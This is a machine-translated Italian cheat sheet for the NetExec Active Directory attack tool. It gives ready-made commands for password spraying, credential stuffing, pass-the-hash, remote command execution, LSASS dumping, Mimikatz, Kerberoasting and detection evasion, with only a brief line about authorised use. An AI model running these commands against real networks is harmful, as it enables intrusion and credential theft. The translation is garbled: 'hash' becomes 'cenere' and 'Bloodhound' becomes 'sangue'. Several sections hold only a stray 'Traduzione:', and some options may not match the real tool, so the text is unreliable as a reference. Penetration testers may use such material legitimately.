Vai al contenuto

NetExec

Traduzione: Copia tutti i comandi Traduzione: Generare PDF < > NetExec (ex CrackMapExec) è uno strumento post-esplorazione che aiuta a automatizzare la valutazione della sicurezza delle grandi reti di Active Directory attraverso l'abuso del protocollo di rete e gli attacchi credenziali. ## Installazione e configurazione | | Command | Description | | | --- | --- | | | `pip3 install netexec` | Install NetExec via pip | | | | `pipx install netexec` | Install with pipx (recommended) | | | | `git clone https://github.com/Pennyw0rth/NetExec.git` | Clone from GitHub | | | | `cd NetExec && pip3 install .` | Install from source | | | | `netexec --version` | Check installed version | | | | `netexec --help` | Display help information | | ## Uso di base | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.0/24` | Scan SMB on subnet | | | | `netexec smb 192.168.1.100 -u username -p password` | Authenticate with credentials | | | | `netexec smb 192.168.1.100 -u username -H ntlmhash` | Authenticate with NTLM hash | | | | `netexec smb 192.168.1.100 -u '' -p ''` | Anonymous authentication | | | | `netexec smb targets.txt -u username -p password` | Use target file | | ## Supporto del protocollo ### Protocollo SMB | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100` | Basic SMB enumeration | | | | `netexec smb 192.168.1.100 --shares` | Enumerate shares | | | | `netexec smb 192.168.1.100 --users` | Enumerate users | | | | `netexec smb 192.168.1.100 --groups` | Enumerate groups | | | | `netexec smb 192.168.1.100 --local-groups` | Enumerate local groups | | | | `netexec smb 192.168.1.100 --sessions` | Enumerate sessions | | | | `netexec smb 192.168.1.100 --disks` | Enumerate disks | | ### Protocollo di WinRM | | Command | Description | | | --- | --- | | | `netexec winrm 192.168.1.100 -u username -p password` | WinRM authentication | | | | `netexec winrm 192.168.1.100 -u username -p password -x "whoami"` | Execute command | | | | `netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1` | Execute PowerShell script | | ### Protocollo LDAP | | Command | Description | | | --- | --- | | | `netexec ldap 192.168.1.100 -u username -p password` | LDAP authentication | | | | `netexec ldap 192.168.1.100 -u username -p password --users` | Enumerate LDAP users | | | | `netexec ldap 192.168.1.100 -u username -p password --groups` | Enumerate LDAP groups | | | | `netexec ldap 192.168.1.100 -u username -p password --computers` | Enumerate computers | | ### Protocollo MSSQL | | Command | Description | | | --- | --- | | | `netexec mssql 192.168.1.100 -u username -p password` | MSSQL authentication | | | | `netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"` | Execute SQL query | | | | `netexec mssql 192.168.1.100 -u username -p password --local-auth` | Local authentication | | ### Protocollo SSH | | Command | Description | | | --- | --- | | | `netexec ssh 192.168.1.100 -u username -p password` | SSH authentication | | | | `netexec ssh 192.168.1.100 -u username -k id_rsa` | SSH key authentication | | | | `netexec ssh 192.168.1.100 -u username -p password -x "id"` | Execute command | | ## Metodi di autenticazione ### Autenticazione della password | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -u username -p password` | Single credential | | | | `netexec smb 192.168.1.100 -u users.txt -p passwords.txt` | Credential lists | | | | `netexec smb 192.168.1.100 -u username -p passwords.txt` | Password spraying | | | | `netexec smb 192.168.1.100 -u users.txt -p password` | User enumeration | | ### Autenticazione della cenere | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -u username -H ntlmhash` | NTLM hash | | | | `netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash` | LM:NTLM hash | | | | `netexec smb 192.168.1.100 -u users.txt -H hashes.txt` | Hash lists | | ### Autenticazione di Kerberos | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -u username -p password -k` | Kerberos authentication | | | | `netexec smb 192.168.1.100 -u username --use-kcache` | Use Kerberos cache | | | | `netexec smb 192.168.1.100 -u username -p password --kerberos` | Force Kerberos | | ## Enumerazione ### Condividi Enumerazione | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --shares` | List shares | | | | `netexec smb 192.168.1.100 --shares -u username -p password` | Authenticated share listing | | | | `netexec smb 192.168.1.100 --spider SHARE` | Spider share contents | | | | `netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt"` | Search for files | | ### Enumerazione dell'utente | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --users` | Enumerate users | | | | `netexec smb 192.168.1.100 --rid-brute` | RID bruteforce | | | | `netexec smb 192.168.1.100 --users --rid-brute 1000-2000` | RID range | | ### Enumerazione di gruppo | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --groups` | Enumerate groups | | | | `netexec smb 192.168.1.100 --local-groups` | Local groups | | | | `netexec smb 192.168.1.100 --groups "Domain Admins"` | Specific group | | ### Enumerazione del computer | | Command | Description | | | --- | --- | | | `netexec ldap 192.168.1.100 --computers` | Enumerate computers | | | | `netexec smb 192.168.1.100 --computers` | SMB computer enumeration | | ## Esecuzione dei comandi ### Esecuzione del comando SMB | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -u username -p password -x "whoami"` | Execute command | | | | `netexec smb 192.168.1.100 -u username -p password -X script.ps1` | Execute PowerShell script | | | | `netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec` | Use WMI execution | | | | `netexec smb 192.168.1.100 -u username -p password --exec-method smbexec` | Use SMB execution | | ### Esecuzione del comando WinRM | | Command | Description | | | --- | --- | | | `netexec winrm 192.168.1.100 -u username -p password -x "Get-Process"` | PowerShell command | | | | `netexec winrm 192.168.1.100 -u username -p password -X script.ps1` | Execute script | | ## Moduli ### Moduli integrati | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -M spider_plus` | Enhanced spidering | | | | `netexec smb 192.168.1.100 -M enum_avproducts` | Enumerate AV products | | | | `netexec smb 192.168.1.100 -M gpp_password` | Group Policy Preferences | | | | `netexec smb 192.168.1.100 -M lsassy` | LSASS dumping | | | | `netexec smb 192.168.1.100 -M mimikatz` | Mimikatz execution | | ### Opzioni del modulo | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false` | Module options | | | | `netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true` | Bloodhound output | | ## Operazioni di database | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --users --export users.csv` | Export to CSV | | | | `netexec db` | Database management | | | | `netexec db --workspace default` | Set workspace | | | | `netexec db --clear-database` | Clear database | | ## Caratteristiche avanzate ### Credential Stuffing | | Command | Description | | | --- | --- | | | `netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success` | Continue on success | | | | `netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3` | Fail limit | | ### Informativa sulla password | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --pass-pol` | Get password policy | | | | `netexec ldap 192.168.1.100 --pass-pol` | LDAP password policy | | ### Integrazione del sangue | | Command | Description | | | --- | --- | | | `netexec ldap 192.168.1.100 -u username -p password --bloodhound` | Collect Bloodhound data | | | | `netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All` | All collections | | ### ASREPRoa | | Command | Description | | | --- | --- | | | `netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt` | ASREPRoast attack | | | | `netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt` | Authenticated ASREPRoast | | ### Kerberoasing | | Command | Description | | | --- | --- | | | `netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt` | Kerberoasting attack | | ## Produzione e registrazione | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --verbose` | Verbose output | | | | `netexec smb 192.168.1.100 --debug` | Debug output | | | | `netexec smb 192.168.1.100 -o output.txt` | Save output to file | | | | `netexec smb 192.168.1.100 --log logs/` | Log directory | | ## Configurazione ### File di configurazione (~/.nxc/nxc.conf) Traduzione: ### Opzioni specifiche del protocollo | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --port 445` | Custom port | | | | `netexec smb 192.168.1.100 --timeout 5` | Connection timeout | | | | `netexec smb 192.168.1.100 --threads 100` | Thread count | | ## Tecniche di evasione | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 --jitter 1-5` | Random delay | | | | `netexec smb 192.168.1.100 --delay 2` | Fixed delay | | | | `netexec smb 192.168.1.100 --obfs` | Obfuscation | | ## Scenari di attacco comuni ### Enumerazione del dominio Traduzione: ### Attacchi Credenziali Traduzione: ### Post-Exploitation Traduzione: ## Integrazione con altri strumenti ### Integrazione di Impacket | | Command | Description | | | --- | --- | | | `netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec` | Use Impacket WMI | | | | `netexec smb 192.168.1.100 -u username -p password --exec-method smbexec` | Use Impacket SMB | | ### Migrazione di Crackmapexec | | Command | Description | | | --- | --- | | | `netexec --convert-cme-db` | Convert CME database | | | | `alias cme='netexec'` | Create alias for compatibility | | ## Risoluzione dei problemi | | Command | Description | | | --- | --- | | | `netexec --help` | General help | | | | `netexec smb --help` | Protocol-specific help | | | | `netexec -v` | Version information | | | | `netexec --debug smb 192.168.1.100` | Debug mode | | ## Migliori Pratiche - Utilizzare l'autenticazione prima dell'enumerazione quando possibile - Implementare ritardi adeguati per evitare il rilevamento - Utilizzare spazi di lavoro per organizzare diversi impegni - Risultati delle esportazioni per ulteriori analisi - Combina con altri strumenti per una valutazione completa - Monitor per le risposte difensive - Utilizzare conteggi filettati appropriati per evitare obiettivi schiaccianti - Implementazione corretta registrazione per la documentazione - Convalida le credenziali prima degli attacchi su larga scala - Utilizzare tecniche di offuscamento quando necessario ## Considerazioni di sicurezza - Utilizzare solo su reti autorizzate - Implementare controlli di accesso adeguati - Monitor per il rilevamento da strumenti di sicurezza - Utilizzare i principi meno privilegi - Documentare tutte le attività di conformità - Coordinare con il team blu quando applicabile - Implementare procedure di pulizia adeguate - Conservare le credenziali in modo sicuro - Utilizzare la comunicazione crittografata quando possibile - Aggiornamenti regolari per mantenere l'efficacia